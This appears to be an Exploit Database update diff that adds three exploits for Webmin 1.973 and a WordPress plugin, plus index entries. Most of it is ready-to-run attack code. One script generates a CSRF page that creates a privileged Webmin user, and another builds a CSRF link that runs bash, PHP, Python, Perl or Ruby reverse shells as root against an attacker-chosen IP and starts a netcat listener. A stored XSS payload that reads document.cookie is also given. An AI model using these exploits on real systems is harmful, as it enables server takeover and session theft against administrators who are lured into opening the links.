DB: 2021-07-21

3 changes to exploits/shellcodes

Webmin 1.973 - 'save_user.cgi' Cross-Site Request Forgery (CSRF)
WordPress Plugin KN Fix Your Title 1.0.1 - 'Separator' Stored Cross-Site Scripting (XSS)
Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)

exploits/linux/webapps/50126.py

@@ -0,0 +1,230 @@
+# Exploit Title: Webmin 1.973 - 'save_user.cgi' Cross-Site Request Forgery (CSRF)
+# Date: 24/04/2021
+# Exploit Author: *Mesh3l_911 & Z0ldyck
+# Vendor Homepage: https://www.webmin.com
+# Repo Link: https://github.com/Mesh3l911/CVE-2021-31762
+# Version: Webmin 1.973
+# Tested on: All versions <= 1.973
+# CVE : CVE-2021-31762
+# POC: https://youtu.be/qCvEXwyaF5U
+
+
+import time, subprocess
+
+print('''\033[1;37m
+
+ __  __           _     ____  _          _________  _     _            _    
+|  \/  |         | |   |___ \| |        |___  / _ \| |   | |          | |   
+| \  / | ___  ___| |__   __) | |           / / | | | | __| |_   _  ___| | __
+| |\/| |/ _ \/ __| '_ \ |__ <| |          / /| | | | |/ _` | | | |/ __| |/ /
+| |  | |  __/\__ \ | | |___) | |  _ _    / /_| |_| | | (_| | |_| | (__|   < 
+|_|  |_|\___||___/_| |_|____/|_| (_|_)  /_____\___/|_|\__,_|\__, |\___|_|\_/
+                                                             __/ |          
+                                                            |___/           
+
+    \033[1;m''')
+
+for i in range(101):
+    print(
+        "\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m )  & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m  ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format(
+            i), "\033[1;36m%\033[1;m", end="")
+    time.sleep(0.02)
+print("\n\n")
+
+target = input(
+    "\033[1;36m \nPlease input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m")
+
+if target.endswith('/'):
+    target = target + 'acl/save_user.cgi'
+else:
+    target = target + '/acl/save_user.cgi'
+
+
+def CSRF_Generator():
+    with open('CSRF_POC.html', 'w') as POC:
+        POC.write \
+            ('''
+
+<html>
+        <head>
+            <meta name="referrer" content="never">
+        </head>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="'''+target+'''" method="POST">
+      <input type="hidden" name="safe" value="" />
+      <input type="hidden" name="name" value="Mesh3l&#95;Z0ldyck" />
+      <input type="hidden" name="pass&#95;def" value="0" />
+      <input type="hidden" name="pass" value="Mesh3l&#95;Z0ldyck123" />
+      <input type="hidden" name="real" value="Mesh3l&#95;Z0ldyck" />
+      <input type="hidden" name="cert&#95;def" value="1" />
+      <input type="hidden" name="lang&#95;def" value="1" />
+      <input type="hidden" name="lang" value="af" />
+      <input type="hidden" name="notabs" value="0" />
+      <input type="hidden" name="theme&#95;def" value="1" />
+      <input type="hidden" name="theme" value="" />
+      <input type="hidden" name="overlay&#95;def" value="1" />
+      <input type="hidden" name="overlay" value="overlay&#45;theme" />
+      <input type="hidden" name="logouttime&#95;def" value="1" />
+      <input type="hidden" name="minsize&#95;def" value="1" />
+      <input type="hidden" name="ipmode" value="0" />
+      <input type="hidden" name="ips" value="" />
+      <input type="hidden" name="days&#95;def" value="1" />
+      <input type="hidden" name="hours&#95;def" value="1" />
+      <input type="hidden" name="hours&#95;hfrom" value="" />
+      <input type="hidden" name="hours&#95;mfrom" value="" />
+      <input type="hidden" name="hours&#95;hto" value="" />
+      <input type="hidden" name="hours&#95;mto" value="" />
+      <input type="hidden" name="mod" value="backup&#45;config" />
+      <input type="hidden" name="mod" value="change&#45;user" />
+      <input type="hidden" name="mod" value="webmincron" />
+      <input type="hidden" name="mod" value="usermin" />
+      <input type="hidden" name="mod" value="webminlog" />
+      <input type="hidden" name="mod" value="webmin" />
+      <input type="hidden" name="mod" value="help" />
+      <input type="hidden" name="mod" value="servers" />
+      <input type="hidden" name="mod" value="acl" />
+      <input type="hidden" name="mod" value="bacula&#45;backup" />
+      <input type="hidden" name="mod" value="init" />
+      <input type="hidden" name="mod" value="passwd" />
+      <input type="hidden" name="mod" value="quota" />
+      <input type="hidden" name="mod" value="mount" />
+      <input type="hidden" name="mod" value="fsdump" />
+      <input type="hidden" name="mod" value="ldap&#45;client" />
+      <input type="hidden" name="mod" value="ldap&#45;useradmin" />
+      <input type="hidden" name="mod" value="logrotate" />
+      <input type="hidden" name="mod" value="mailcap" />
+      <input type="hidden" name="mod" value="mon" />
+      <input type="hidden" name="mod" value="pam" />
+      <input type="hidden" name="mod" value="certmgr" />
+      <input type="hidden" name="mod" value="proc" />
+      <input type="hidden" name="mod" value="at" />
+      <input type="hidden" name="mod" value="cron" />
+      <input type="hidden" name="mod" value="sentry" />
+      <input type="hidden" name="mod" value="man" />
+      <input type="hidden" name="mod" value="syslog" />
+      <input type="hidden" name="mod" value="syslog&#45;ng" />
+      <input type="hidden" name="mod" value="system&#45;status" />
+      <input type="hidden" name="mod" value="useradmin" />
+      <input type="hidden" name="mod" value="apache" />
+      <input type="hidden" name="mod" value="bind8" />
+      <input type="hidden" name="mod" value="pserver" />
+      <input type="hidden" name="mod" value="dhcpd" />
+      <input type="hidden" name="mod" value="dhcp&#45;dns" />
+      <input type="hidden" name="mod" value="dovecot" />
+      <input type="hidden" name="mod" value="exim" />
+      <input type="hidden" name="mod" value="fetchmail" />
+      <input type="hidden" name="mod" value="foobar" />
+      <input type="hidden" name="mod" value="frox" />
+      <input type="hidden" name="mod" value="jabber" />
+      <input type="hidden" name="mod" value="ldap&#45;server" />
+      <input type="hidden" name="mod" value="majordomo" />
+      <input type="hidden" name="mod" value="htpasswd&#45;file" />
+      <input type="hidden" name="mod" value="minecraft" />
+      <input type="hidden" name="mod" value="mysql" />
+      <input type="hidden" name="mod" value="openslp" />
+      <input type="hidden" name="mod" value="postfix" />
+      <input type="hidden" name="mod" value="postgresql" />
+      <input type="hidden" name="mod" value="proftpd" />
+      <input type="hidden" name="mod" value="procmail" />
+      <input type="hidden" name="mod" value="qmailadmin" />
+      <input type="hidden" name="mod" value="mailboxes" />
+      <input type="hidden" name="mod" value="sshd" />
+      <input type="hidden" name="mod" value="samba" />
+      <input type="hidden" name="mod" value="sendmail" />
+      <input type="hidden" name="mod" value="spam" />
+      <input type="hidden" name="mod" value="squid" />
+      <input type="hidden" name="mod" value="sarg" />
+      <input type="hidden" name="mod" value="wuftpd" />
+      <input type="hidden" name="mod" value="webalizer" />
+      <input type="hidden" name="mod" value="link" />
+      <input type="hidden" name="mod" value="adsl&#45;client" />
+      <input type="hidden" name="mod" value="bandwidth" />
+      <input type="hidden" name="mod" value="fail2ban" />
+      <input type="hidden" name="mod" value="firewalld" />
+      <input type="hidden" name="mod" value="ipsec" />
+      <input type="hidden" name="mod" value="krb5" />
+      <input type="hidden" name="mod" value="firewall" />
+      <input type="hidden" name="mod" value="firewall6" />
+      <input type="hidden" name="mod" value="exports" />
+      <input type="hidden" name="mod" value="exports&#45;nfs4" />
+      <input type="hidden" name="mod" value="xinetd" />
+      <input type="hidden" name="mod" value="inetd" />
+      <input type="hidden" name="mod" value="pap" />
+      <input type="hidden" name="mod" value="ppp&#45;client" />
+      <input type="hidden" name="mod" value="pptp&#45;client" />
+      <input type="hidden" name="mod" value="pptp&#45;server" />
+      <input type="hidden" name="mod" value="stunnel" />
+      <input type="hidden" name="mod" value="shorewall" />
+      <input type="hidden" name="mod" value="shorewall6" />
+      <input type="hidden" name="mod" value="itsecur&#45;firewall" />
+      <input type="hidden" name="mod" value="tcpwrappers" />
+      <input type="hidden" name="mod" value="idmapd" />
+      <input type="hidden" name="mod" value="filter" />
+      <input type="hidden" name="mod" value="burner" />
+      <input type="hidden" name="mod" value="grub" />
+      <input type="hidden" name="mod" value="lilo" />
+      <input type="hidden" name="mod" value="raid" />
+      <input type="hidden" name="mod" value="lvm" />
+      <input type="hidden" name="mod" value="fdisk" />
+      <input type="hidden" name="mod" value="lpadmin" />
+      <input type="hidden" name="mod" value="smart&#45;status" />
+      <input type="hidden" name="mod" value="time" />
+      <input type="hidden" name="mod" value="vgetty" />
+      <input type="hidden" name="mod" value="iscsi&#45;client" />
+      <input type="hidden" name="mod" value="iscsi&#45;server" />
+      <input type="hidden" name="mod" value="iscsi&#45;tgtd" />
+      <input type="hidden" name="mod" value="iscsi&#45;target" />
+      <input type="hidden" name="mod" value="cluster&#45;passwd" />
+      <input type="hidden" name="mod" value="cluster&#45;copy" />
+      <input type="hidden" name="mod" value="cluster&#45;cron" />
+      <input type="hidden" name="mod" value="cluster&#45;shell" />
+      <input type="hidden" name="mod" value="cluster&#45;shutdown" />
+      <input type="hidden" name="mod" value="cluster&#45;usermin" />
+      <input type="hidden" name="mod" value="cluster&#45;useradmin" />
+      <input type="hidden" name="mod" value="cluster&#45;webmin" />
+      <input type="hidden" name="mod" value="cfengine" />
+      <input type="hidden" name="mod" value="heartbeat" />
+      <input type="hidden" name="mod" value="shell" />
+      <input type="hidden" name="mod" value="custom" />
+      <input type="hidden" name="mod" value="disk&#45;usage" />
+      <input type="hidden" name="mod" value="export&#45;test" />
+      <input type="hidden" name="mod" value="ftelnet" />
+      <input type="hidden" name="mod" value="filemin" />
+      <input type="hidden" name="mod" value="flashterm" />
+      <input type="hidden" name="mod" value="tunnel" />
+      <input type="hidden" name="mod" value="file" />
+      <input type="hidden" name="mod" value="phpini" />
+      <input type="hidden" name="mod" value="cpan" />
+      <input type="hidden" name="mod" value="htaccess&#45;htpasswd" />
+      <input type="hidden" name="mod" value="telnet" />
+      <input type="hidden" name="mod" value="ssh" />
+      <input type="hidden" name="mod" value="ssh2" />
+      <input type="hidden" name="mod" value="shellinabox" />
+      <input type="hidden" name="mod" value="status" />
+      <input type="hidden" name="mod" value="ajaxterm" />
+      <input type="hidden" name="mod" value="updown" />
+      <input type="hidden" name="mod" value="vnc" />
+      <input type="submit" value="Submit request" />
+    </form>
+    <script>
+      document.forms[0].submit();
+    </script>
+  </body>
+</html>
+
+
+    ''')
+    POC.close()
+
+    print(
+        "\033[1;36m\nThe CSRF_POC has been generated successfully , send it to a Webmin's Admin and ur privileged user creds would be \n\nUsername: \033[1;m\033[1;37mMesh3l_Z0ldyck\033[1;m\n\033[1;36mPassword:\033[1;m \033[1;37mMesh3l_Z0ldyck123\n\033[1;m\n\n\033[1;36mHappy Hunting ^_^ \n\033[1;m")
+
+
+
+def main():
+    CSRF_Generator()
+
+
+if __name__ == '__main__':
+    main()

exploits/linux/webapps/50144.py

@@ -0,0 +1,122 @@
+# Exploit Title: Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)
+# Date: 24/04/2021
+# Exploit Author: Mesh3l_911 & Z0ldyck
+# Vendor Homepage: https://www.webmin.com
+# Repo Link: https://github.com/Mesh3l911/CVE-2021-31761
+# Version: Webmin 1.973
+# Tested on: All versions <= 1.973
+# CVE: CVE-2021-31761
+# Description: Exploiting a Reflected Cross-Site Scripting (XSS) attack to
+# get a Remote Command Execution (RCE) through the Webmin's running process
+# feature
+
+import time, subprocess,random,urllib.parse
+
+
+print('''\033[1;37m
+
+ __  __           _     ____  _          _________  _     _            _    
+|  \/  |         | |   |___ \| |        |___  / _ \| |   | |          | |   
+| \  / | ___  ___| |__   __) | |           / / | | | | __| |_   _  ___| | __
+| |\/| |/ _ \/ __| '_ \ |__ <| |          / /| | | | |/ _` | | | |/ __| |/ /
+| |  | |  __/\__ \ | | |___) | |  _ _    / /_| |_| | | (_| | |_| | (__|   < 
+|_|  |_|\___||___/_| |_|____/|_| (_|_)  /_____\___/|_|\__,_|\__, |\___|_|\_/
+                                                             __/ |          
+                                                            |___/           
+
+    \033[1;m''')
+
+for i in range(101):
+    print(
+        "\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m )  & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m  ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format(
+            i), "\033[1;36m%\033[1;m", end="")
+    time.sleep(0.02)
+print("\n\n")
+
+target = input(
+    "\033[1;36m \n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m")
+
+if target.endswith('/'):
+    target = target + 'tunnel/link.cgi/'
+else:
+    target = target + '/tunnel/link.cgi/'
+
+ip = input("\033[1;36m \n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \033[1;m")
+
+port = input("\033[1;36m \n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \033[1;m")
+
+ReverseShell = input \
+('''\033[1;37m
+\n
+1- Bash Reverse Shell \n
+2- PHP Reverse Shell \n
+3- Python Reverse Shell \n
+4- Perl Reverse Shell \n
+5- Ruby Reverse Shell \n
+\033[1;m
+
+\033[1;36mPlease insert the number Reverse Shell's type u want e.g. ( 1 ) > \033[1;m''')
+
+file_name = random.randrange(1000)
+
+if ReverseShell == '1':
+    ReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0</tmp/'+str(file_name)+' | /bin/sh >/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+''
+
+elif ReverseShell == '2':
+    ReverseShell = ''' php -r '$sock=fsockopen("''' + ip + '''",''' + port + ''');exec("/bin/sh -i <&3 >&3 2>&3");' '''
+
+elif ReverseShell == '3':
+    ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("''' + ip + '''",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' '''
+
+elif ReverseShell == '4':
+    ReverseShell = ''' perl -e 'use Socket;$i="''' + ip + '''";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' '''
+
+elif ReverseShell == '5':
+    ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open("''' + ip + '''",''' + port + ''').to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' '''
+
+else:
+    print("\033[1;36m \n Please Re-Check ur input :( \033[1;m \n")
+
+
+def CSRF_Generator():
+    Payload = urllib.parse.quote('''
+
+<html>
+        <head>
+            <meta name="referrer" content="never">
+        </head>
+  <body>
+    <script>history.pushState('', '', '/')</script>
+    <form action="/proc/run.cgi" method="POST">
+      <input type="hidden" name="cmd" value="''' + ReverseShell + '''" />
+      <input type="hidden" name="mode" value="0" />
+      <input type="hidden" name="user" value="root" />
+      <input type="hidden" name="input" value="" />
+      <input type="hidden" name="undefined" value="" />
+      <input type="submit" value="Submit request" />
+    </form>
+    <script>
+      document.forms[0].submit();
+    </script>
+  </body>
+
+</html>
+
+        ''')
+
+    print("\033[1;36m\nHere's ur link , send it to a Webmin's Admin and wait for ur Reverse Shell ^_^ \n \n\033[1;m")
+
+    print(target+Payload)
+
+def Netcat_listener():
+    print()
+    subprocess.run(["nc", "-nlvp "+port+""])
+
+
+def main():
+    CSRF_Generator()
+    Netcat_listener()
+
+
+if __name__ == '__main__':
+    main()

exploits/php/webapps/50143.txt

@@ -0,0 +1,16 @@
+# Exploit Title: WordPress Plugin KN Fix Your Title 1.0.1 - 'Separator' Stored Cross-Site Scripting (XSS)
+# Date: 19/07/2021
+# Exploit Author: Aakash Choudhary
+# Software Link: https://wordpress.org/plugins/kn-fix-your/
+# Version: 1.0.1
+# Category: Web Application
+# Tested on Mac
+
+How to Reproduce this Vulnerability:
+
+1. Install WordPress 5.7.2
+2. Install and activate KN Fix Your Title
+3. Navigate to Fix Title under Settings Tab >> Click on I have done this and enter the XSS payload into the Separator input field.
+4. Click Save Changes.
+5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up.
+6. Payload Used: "><script>alert(document.cookie)</script>

files_exploits.csv

@@ -26046,6 +26046,7 @@ id,file,description,date,author,type,platform,port
 12866,exploits/php/webapps/12866.txt,"K9 Kreativity Design - 'pages.php' SQL Injection",2010-06-03,Newbie_Campuz,webapps,php,
 12867,exploits/php/webapps/12867.txt,"clickartweb Design - SQL Injection",2010-06-03,cyberlog,webapps,php,
 12868,exploits/php/webapps/12868.txt,"Joomla! Component com_lead - SQL Injection",2010-06-03,ByEge,webapps,php,
+50126,exploits/linux/webapps/50126.py,"Webmin 1.973 - 'save_user.cgi' Cross-Site Request Forgery (CSRF)",2021-07-14,Mesh3l_911,webapps,linux,
 49439,exploits/php/webapps/49439.txt,"Life Insurance Management System 1.0 - 'client_id' SQL Injection",2021-01-18,"Aitor Herrero",webapps,php,
 49440,exploits/php/webapps/49440.txt,"Life Insurance Management System 1.0 - File Upload RCE (Authenticated)",2021-01-18,"Aitor Herrero",webapps,php,
 49441,exploits/php/webapps/49441.txt,"osTicket 1.14.2 - SSRF",2021-01-19,"Talat Mehmood",webapps,php,
@@ -44275,3 +44276,5 @@ id,file,description,date,author,type,platform,port
 50139,exploits/php/webapps/50139.txt,"WordPress Plugin Mimetic Books 0.2.13 - 'Default Publisher ID field' Stored Cross-Site Scripting (XSS)",2021-07-19,"Vikas Srivastava",webapps,php,
 50140,exploits/php/webapps/50140.ps1,"Dolibarr ERP/CRM 10.0.6 - Login Brute Force",2021-07-19,"Creamy Chicken Soup",webapps,php,
 50142,exploits/php/webapps/50142.txt,"PEEL Shopping 9.3.0 - 'id' Time-based SQL Injection",2021-07-19,faisalfs10x,webapps,php,
+50143,exploits/php/webapps/50143.txt,"WordPress Plugin KN Fix Your Title 1.0.1 - 'Separator' Stored Cross-Site Scripting (XSS)",2021-07-20,"Aakash Choudhary",webapps,php,
+50144,exploits/linux/webapps/50144.py,"Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)",2021-07-20,Mesh3l_911,webapps,linux,